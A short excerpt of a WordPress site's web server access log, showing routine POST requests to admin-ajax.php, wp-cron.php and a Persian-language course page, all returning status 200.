202.62.52.20 - - [02/May/2025:17:58:23 +0330] "POST /wp-admin/admin-ajax.php?action=wpdAddSubscription HTTP/1.1" 200 80 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
31.214.174.196 - - [02/May/2025:17:58:48 +0330] "POST /wp-cron.php?doing_wp_cron=1746196128.7301280498504638671875 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
202.62.52.20 - - [02/May/2025:17:58:47 +0330] "POST /courses/%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d8%a8%d9%87%db%8c%d9%86%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d8%af%d8%b1-%d9%be%d8%a7%db%8c%d8%aa%d9%88%d9%86-%d8%a8%d8%a7-%d9%be%da%a9%db%8c%d8%ac-%d9%87%d8%a7%db%8c-%da%af/ HTTP/1.1" 200 94830 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
